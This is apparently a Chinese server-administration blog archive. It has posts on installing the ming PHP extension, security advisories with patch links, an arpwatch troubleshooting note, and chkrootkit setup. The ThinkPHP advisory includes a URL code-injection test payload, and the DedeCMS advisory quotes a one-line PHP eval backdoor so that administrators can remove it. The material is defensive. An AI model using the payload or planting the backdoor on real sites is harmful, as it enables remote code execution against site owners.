Skip to content


安装discuz启用flash验证码需要的ming库

近日不断有人换ip来暴力猜discuz密码,开启验证码机制可以减少成功率.

让php支持flash需安装ming库
http://www.libming.org/
当前最新版为ming-0.4.4

一.安装ming

wget http://cdnetworks-kr-1.dl.sourceforge.net/project/ming/Releases/ming-0.4.4.tar.gz
tar zxvf ming-0.4.4.tar.gz
cd ming-0.4.4
./configure
make
make install

二.安装php扩展
进入到php源码目录
/opt/php 为 /opt/php-5.2.17p1 的软链接


cd /home/c1g/src/php-5.2.17/ext/ming
/opt/php/bin/phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20060613
Zend Extension Api No: 220060519

./configure –with-php-config=/opt/php/bin/php-config
make
make install

查看是否生成ming.so
ll /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/
-rwxr-xr-x 1 root root 367094 Apr 13 13:14 ming.so

三.配置php.ini
在php.ini中指定好扩展的目录和需加载的库
vi /opt/php/etc/php.ini

extension_dir = “/opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/”
extension = “ming.so”

重启php
/opt/php/sbin/php-fpm reload

在phpinfo中可以看到

Ming SWF output library enabled
Version 0.4.4

或用命令行查看
/opt/php/bin/php -m

[PHP Modules]
bcmath
ctype
curl
date
dom
eAccelerator
filter
gd
hash
iconv
imagick
json
libxml
mbstring
mcrypt
memcache
mhash
ming
mysql
mysqli
openssl
pcntl
pcre
PDO
pdo_sqlite
posix
Reflection
session
shmop
SimpleXML
soap
sockets
SPL
SQLite
standard
sysvsem
tokenizer
xml
xmlreader
xmlrpc
xmlwriter
Zend Optimizer
zip
zlib

[Zend Modules]
Zend Optimizer
eAccelerator

四,discuz设置
discuz后台->全局->防灌水设置 设置开启Flash 验证码
用户->用户组->游客及相关用户组 启用防灌水验证码或验证问答机制
注意:用户权限一定要设置

参考:phpize不重新编译PHP实现扩展的安装

Posted in Discuz/Uchome/Ucenter, PHP.

Tagged with , , .


ThinkPhp web框架 php代码任意执行漏洞

漏洞版本:
ThinkPHP
漏洞描述:
ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架

ThinkPHP不正确过滤用户提交的参数,远程攻击者可以利用漏洞以应用程序上下文执行任意PHP代码

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
index.php/module/action/param1/${@print(THINK_VERSION)}
安全建议:
用户可下载官方发布的补丁:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
或者或者直接修改源码:
/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
$res = preg_replace(‘@(w+)’.$depr.'([^’.$depr.’\/]+)@e’, ‘$var[\’\\1\’]=”\\2″;’, implode($depr,$paths));
修改为
$res = preg_replace(‘@(w+)’.$depr.'([^’.$depr.’\/]+)@e’, ‘$var[\’\\1\’]=”\\2′;’, implode($depr,$paths));
将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。

来自sebug.net

Posted in 安全通告, 技术.

Tagged with , .


Oracle MySQL Server两个不明细节本地漏洞

发布时间: 2012-04-09
漏洞版本:
Oracle MySQL 5.x
漏洞描述:
MySQL是一个小型关系型数据库管理系统,开发者为瑞典MySQLAB公司,在2008年1月16号被Sun公司收购。

Oracle MySQL在实现上存在两个安全漏洞,可被本地利用造成一定的影响。
<* 参考 http://dev.mysql.com/doc/refman/5.5/en/news-5-5-22.html *>
安全建议:
厂商补丁:

Oracle
——
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.oracle.com/technetwork/topics/security/

Posted in Mysql, 安全通告.


ImageMagick拒绝服务漏洞

发布时间: 2012-04-09
更新时间: 2012-04-09
危害等级: 中危
漏洞类型:
威胁类型: 远程
CVE编号: CVE-2012-0259

ImageMagick是一款Unix/Linux平台下开源的图像查看和编辑工具。
ImageMagick中存在拒绝服务漏洞,该漏洞源于在解析一个组件计数(components count)为0的JPEG EXIF 标签时“GetEXIFProperty()”函数(magick/property.c)中的一个错误。攻击者可利用该漏洞借助特制的JPEG图片,访问未初始化的或无效的内存。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629
http://www.cert.fi/en/reports/2012/vulnerability635606.html

来源:www.imagemagick.org
链接:http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629

来源:www.cert.fi
链接:http://www.cert.fi/en/reports/2012/vulnerability635606.html

来源:seclists.org
链接:http://seclists.org/oss-sec/2012/q2/19

来源:SECUNIA
名称:48679
链接:http://secunia.com/advisories/48679

Posted in Imagemagick, 安全通告.

Tagged with , .


libpng ‘png_set_text_2()’ 内存破坏漏洞

发布时间: 2012-04-01
更新时间: 2012-04-01
危害等级: 高危
漏洞类型:
威胁类型: 远程
CVE编号: CVE-2011-3048

libpng是多种应用程序所使用的解析PNG图形格式的函数库。
Libpng中存在漏洞,此漏洞源于在解析某些文本块时”png_set_text_2()”函数中的错误。攻击者可利用该漏洞借助特制PNG文件损坏栈内存,成功利用该漏洞可能导致执行任意代码。libpng 1.5.10之前版本、1.4.11版本、1.2.49版本和1.0.59版本中存在该漏洞。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

来源:www.libpng.org
链接:http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

来源:SECUNIA
名称:48587
链接:http://secunia.com/advisories/48587

Posted in 安全通告.

Tagged with , .


phpMyAdmin敏感信息泄露漏洞

phpMyAdmin是一个免费的WWW界面的mysql数据库管理工具。
phpMyAdmin 3.4.10.2之前的3.4.x版本中的show_config_errors.php中存在漏洞。当配置文件不存在时,远程攻击者可借助一个直接请求获取敏感信息(泄露关于丢失文件的安装路径的错误消息)。

Lempelf用的是phpMyAdmin 3.4.10.1 注意要升级了

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
http://www.mandriva.com/en/downloads/

来源: github.com
链接:https://github.com/phpmyadmin/phpmyadmin/commit/c51817d3b8cb05ff54dca9373c0667e29b8498d4

来源: www.phpmyadmin.net
链接:http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php

Posted in 安全通告.

Tagged with , .


织梦(DedeCMS)后门远程代码执行漏洞

DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。

DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。
DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门
shopcar.class.php被植入一句话@eval(file_get_contents(‘php://input’));

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents(‘php://input’));即可。

http://www.wooyun.org/bugs/wooyun-2010-05416

Posted in 安全通告.

Tagged with , .


Microsoft Windows远程桌面协议3389代码执行漏洞

Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows XP SP2与SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2及R2 SP1,与Windows 7 Gold与SP1版本中的远程桌面协议(RDP)实现中存在漏洞,该漏洞源于没有正确处理内存中的数据包。远程攻击者可通过发送特制RDP数据包触发访问(1)没有正确初始化或者(2)已被删除的对象,执行任意代码。也称‘Remote Desktop Protocol Vulnerability’。
该漏洞已有修复补丁,如果未能及时安装补丁可采取以下临时修复措施:
方法一:禁用终端服务、远程桌面、远程协助和 Windows Small Business Server 2003 远程工作网站功能;
方法二:在企业周边防火墙中屏蔽TCP端口3389;
方法三:在运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本的系统上启用网络级别身份验证。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020

来源: MS
名称: MS12-020
链接:http://technet.microsoft.com/security/bulletin/MS12-020

来源:SECUNIA
名称:48353
链接:http://secunia.com/advisories/48353

Posted in 安全通告.


DELL R410远程管理ip引起的arp问题

arpwatch 命令: 跟踪以太网地址和IP地址配对情况,通过E-mail的形式报告当前的变化。arpwatch使用pcap来监听本网卡和ARP数据包
参数

-d 输出调试信息
-N 使报告不能正常进行
-f<文件> 监听的ARP记录
-i<网卡接口> 指定监听的网卡
-n 指定附加的本地网络
-r<文件> 不从网络上监听ARP信息,而是从文件中读取ARP的记录信息
-u 指定用户和用户组
-e 发送邮件给指定用户,非默认的root用户
-s 指定用户名作为返回地址,而不是默认的用户root

【系统报告信息】

ethernet broadcast :主机的MAC地址是广播地址
ip broadcast :主机的IP地址是广播地址
bogon :源IP地址不是本地子网地址
ethernet mismatch :源MAC地址与ARP数据包里面的地址不匹配
reused old ethernet address :MAC 地址发送变化
suppressed DECnet flip flop :禁止“flip flop”报告

本地的内网为192.168.0.0/24
服务器dell r410
系统centos5.x centos6.x

开启arpwatch
#arpwatch

#tail -f /var/log/messages

Apr 1 11:58:06 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:23 c1g arpwatch: bogon 192.168.0.283 83:22:d6:a1:ad:31
Apr 1 11:58:29 c1g arpwatch: new station 220.188.155.1 0:23:e2:e1:ff:82
Apr 1 11:58:29 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8
Apr 1 11:58:33 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:58:37 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:41 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

bogon 表示源IP地址不是本地子网地址
多台机器日志中都可以查到多个mac地址占用192.168.0.120
192.168.0.120这个ip我并没有配过
很奇怪的是mac就固定的这几个,不像是arp攻击

Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8
Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

仔细对比的日志中的mac地址和现用的eth1相差一位;
联想到手上的一台r410启动时好像出现过192.168.0.120这个ip;
查了下资料dell的远程管理ip地址默认为192.168.0.120;
立马测试了下,在启动到SAS后,按ctrl+c进入IP管理disabled此项
再启动后就少了这个mac地址,证明有效

Posted in IDC, Linux 命令, 安全.

Tagged with , , , .


入侵监测软件chkrootkit 安装

rootkit是入侵者经常使用的工具,这类工具可以隐秘、令用户不易察觉的建立了一条能够总能够入侵系统或者说对系统进行实时控制的途径.chkrootkit是可以查找系统是否被安装rootkit的工具,当然无法100%的查出,在系统被安装之后,或者说服务器开放之前就把它装好吧.
http://www.chkrootkit.org官方网站
目前最新版为chkrootkit-0.49
官方可能无法正常下载,可以用我博客里的地址http://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz
测试系统为centos5.8

一.安装

wget http://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit*
make sense
cd ..
mv -f chkrootkit-* /usr/local/chkrootkit
chown -R root:root /usr/local/chkrootkit
chmod -R 700 /usr/local/chkrootkit

二.运行

有些命令是当前目录下运行需cd到chkrootkit目录
cd /usr/local/chkrootkit
./chkrootkit

ROOTDIR is `/’
Checking `amd’… not found
Checking `basename’… not infected
Checking `biff’… not found
Checking `chfn’… not infected
Checking `chsh’… not infected
Checking `cron’… not infected
Checking `crontab’… not infected
Checking `date’… not infected
Checking `du’… not infected
Checking `dirname’… not infected
Checking `echo’… not infected
Checking `egrep’… not infected
Checking `env’… not infected
Checking `find’… not infected
Checking `fingerd’… not found
Checking `gpm’… not infected
Checking `grep’… not infected
Checking `hdparm’… not infected
Checking `su’… not infected
Checking `ifconfig’… not infected
Checking `inetd’… not tested
Checking `inetdconf’… not found
Checking `identd’… not found
Checking `init’… not infected
Checking `killall’… not infected
Checking `ldsopreload’… not infected
Checking `login’… not infected
Checking `ls’… not infected
Checking `lsof’… not infected
Checking `mail’… not infected
Checking `mingetty’… not infected
Checking `netstat’… not infected
Checking `named’… not found
Checking `passwd’… not infected
Checking `pidof’… not infected
Checking `pop2’… not found
Checking `pop3’… not found
Checking `ps’… not infected
Checking `pstree’… not infected
Checking `rpcinfo’… not infected
Checking `rlogind’… not found
Checking `rshd’… not found
Checking `slogin’… not infected
Checking `sendmail’… not infected
Checking `sshd’… not infected
Checking `syslogd’… not infected
Checking `tar’… not infected
Checking `tcpd’… not infected
Checking `tcpdump’… not infected
Checking `top’… not infected
Checking `telnetd’… not infected
Checking `timed’… not found
Checking `traceroute’… not infected
Checking `vdir’… not infected
Checking `w’… not infected
Checking `write’… not infected
Checking `aliens’… no suspect files
Searching for sniffer’s logs, it may take a while… nothing found
Searching for HiDrootkit’s default dir… nothing found
Searching for t0rn’s default files and dirs… nothing found
Searching for t0rn’s v8 defaults… nothing found
Searching for Lion Worm default files and dirs… nothing found
Searching for RSHA’s default files and dir… nothing found
Searching for RH-Sharpe’s default files… nothing found
Searching for Ambient’s rootkit (ark) default files and dirs… nothing found
Searching for suspicious files and dirs, it may take a while…
/usr/lib/python2.4/config/.relocation-tag /usr/lib/gtk-2.0/immodules/.relocation-tag /usr/lib/.libgcrypt.so.11.hmac /lib/.libssl.so.0.9.8e.hmac /lib/.libcrypto.so.0.9.8e.hmac /lib/.libssl.so.6.hmac /lib/.libcrypto.so.6.hmac

Searching for LPD Worm files and dirs… nothing found
Searching for Ramen Worm files and dirs… nothing found
Searching for Maniac files and dirs… nothing found
Searching for RK17 files and dirs… nothing found
Searching for Ducoci rootkit… nothing found
Searching for Adore Worm… nothing found
Searching for ShitC Worm… nothing found
Searching for Omega Worm… nothing found
Searching for Sadmind/IIS Worm… nothing found
Searching for MonKit… nothing found
Searching for Showtee… nothing found
Searching for OpticKit… nothing found
Searching for T.R.K… nothing found
Searching for Mithra… nothing found
Searching for LOC rootkit… nothing found
Searching for Romanian rootkit… nothing found
Searching for HKRK rootkit… nothing found
Searching for Suckit rootkit… nothing found
Searching for Volc rootkit… nothing found
Searching for Gold2 rootkit… nothing found
Searching for TC2 Worm default files and dirs… nothing found
Searching for Anonoying rootkit default files and dirs… nothing found
Searching for ZK rootkit default files and dirs… nothing found
Searching for ShKit rootkit default files and dirs… nothing found
Searching for AjaKit rootkit default files and dirs… nothing found
Searching for zaRwT rootkit default files and dirs… nothing found
Searching for Madalin rootkit default files… nothing found
Searching for Fu rootkit default files… nothing found
Searching for ESRK rootkit default files… nothing found
Searching for rootedoor… nothing found
Searching for ENYELKM rootkit default files… nothing found
Searching for common ssh-scanners default files… nothing found
Searching for suspect PHP files…
/tmp/pear/download/Archive_Tar-1.3.9/Archive/Tar.php
/tmp/pear/download/XML_Util-1.2.1/tests/AllTests.php
/tmp/pear/download/XML_Util-1.2.1/Util.php
/tmp/pear/download/XML_Util-1.2.1/examples/example2.php
/tmp/pear/download/XML_Util-1.2.1/examples/example.php
/tmp/pear/download/Archive_Tar-1.3.7/Archive/Tar.php
/tmp/pear/download/Structures_Graph-1.0.4/tests/testCase/BasicGraph.php
/tmp/pear/download/Structures_Graph-1.0.4/tests/AllTests.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Node.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/AcyclicTest.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/TopologicalSorter.php
/tmp/pear/download/PEAR-1.9.1/PEAR5.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/10.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/13.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/11.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Builder.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Downloader/Package.php
/tmp/pear/download/PEAR-1.9.1/PEAR/FixPHP5PEARWarnings.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Data.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Doc.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Php.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Cfg.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Src.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Www.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Test.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Script.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Ext.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Packager.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Validator/PECL.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Config.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Registry.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Install.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Mirror.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Remote.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Build.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Config.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Registry.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Pickle.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Channels.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Auth.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Test.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Package.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile.php
/tmp/pear/download/PEAR-1.9.1/PEAR/RunTest.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Autoloader.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Frontend.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Validate.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ErrorStack.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile/Parser.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/XMLParser.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Downloader.php
/tmp/pear/download/PEAR-1.9.1/PEAR/DependencyDB.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/Validator.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Dependency2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Exception.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Frontend/CLI.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile.php
/tmp/pear/download/PEAR-1.9.1/scripts/peclcmd.php
/tmp/pear/download/PEAR-1.9.1/scripts/pearcmd.php
/tmp/pear/download/PEAR-1.9.1/System.php
/tmp/pear/download/PEAR-1.9.1/PEAR.php
/tmp/pear/download/PEAR-1.9.1/OS/Guess.php
/tmp/pear/download/Console_Getopt-1.2.3/Console/Getopt.php
/tmp/pear/download/PEAR-1.9.4/PEAR5.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/10.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/13.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/11.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Builder.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Downloader/Package.php
/tmp/pear/download/PEAR-1.9.4/PEAR/FixPHP5PEARWarnings.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Data.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Doc.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Php.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Cfg.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Src.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Www.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Test.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Script.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Ext.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Packager.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Validator/PECL.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Config.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Registry.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Install.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Mirror.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Remote.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Build.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Config.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Registry.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Pickle.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Channels.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Auth.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Test.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Package.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile.php
/tmp/pear/download/PEAR-1.9.4/PEAR/RunTest.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Autoloader.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Frontend.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Validate.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ErrorStack.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Replace.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Unixeol.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Windowseol.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Task/Postinstallscript/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile/Parser.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/XMLParser.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Downloader.php
/tmp/pear/download/PEAR-1.9.4/PEAR/DependencyDB.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/rw.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v2/Validator.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Generator/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/PackageFile/Parser/v1.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Dependency2.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Exception.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Frontend/CLI.php
/tmp/pear/download/PEAR-1.9.4/PEAR/ChannelFile.php
/tmp/pear/download/PEAR-1.9.4/scripts/peclcmd.php
/tmp/pear/download/PEAR-1.9.4/scripts/pearcmd.php
/tmp/pear/download/PEAR-1.9.4/System.php
/tmp/pear/download/PEAR-1.9.4/PEAR.php
/tmp/pear/download/PEAR-1.9.4/OS/Guess.php
/tmp/pear/download/Console_Getopt-1.3.1/Console/Getopt.php
/tmp/pear/download/Structures_Graph-1.0.3/tests/testCase/BasicGraph.php
/tmp/pear/download/Structures_Graph-1.0.3/tests/AllTests.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Node.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/AcyclicTest.php
/tmp/pear/download/Structures_Graph-1.0.3/Structures/Graph/Manipulator/TopologicalSorter.php

Searching for anomalies in shell history files… Warning: `//root/.mysql_history’ is linked to another file
Checking `asp’… not infected
Checking `bindshell’… not infected
Checking `lkm’… chkproc: nothing detected
chkdirs: nothing detected
Checking `rexedcs’… not found
Checking `sniffer’… eth0: not promisc and no PF_PACKET sockets
Checking `w55808’… not infected
Checking `wted’… chkwtmp: nothing deleted
Checking `scalper’… not infected
Checking `slapper’… not infected
Checking `z2’… chklastlog: nothing deleted
Checking `chkutmp’… chkutmp: nothing deleted
Checking `OSX_RSPLUG’… not infected

以上文件没有问题,出现INFECTED那就要小心了
./chkrootkit | grep INFECTED

三.自动运行

创建每日运行脚本,发现问题后自动发送邮件
vi chkrootkitcron.sh

#!/bin/bash
TOOLKITSPATH=/usr/local
MAILUSER=root@localhost
file_chkrootkit_log=chkrootkitcron.log
servername=`hostname`
date=`date +%Y-%m-%d`

cd ${TOOLKITSPATH}/chkrootkit
./chkrootkit > ${file_chkrootkit_log}
[ ! -z “$(grep INFECTED ${file_chkrootkit_log})” ] && \
grep INFECTED ${file_chkrootkit_log} | mail -s “[chkrootkit] report in ${servername} ${date}” ${MAILUSER}

放入crontab中

echo “40 5 * * * cd /opt/shell && /bin/sh ./chkrootkitcron.sh > /dev/null 2>&1” >> /var/spool/cron/root

Posted in 安全.

Tagged with , .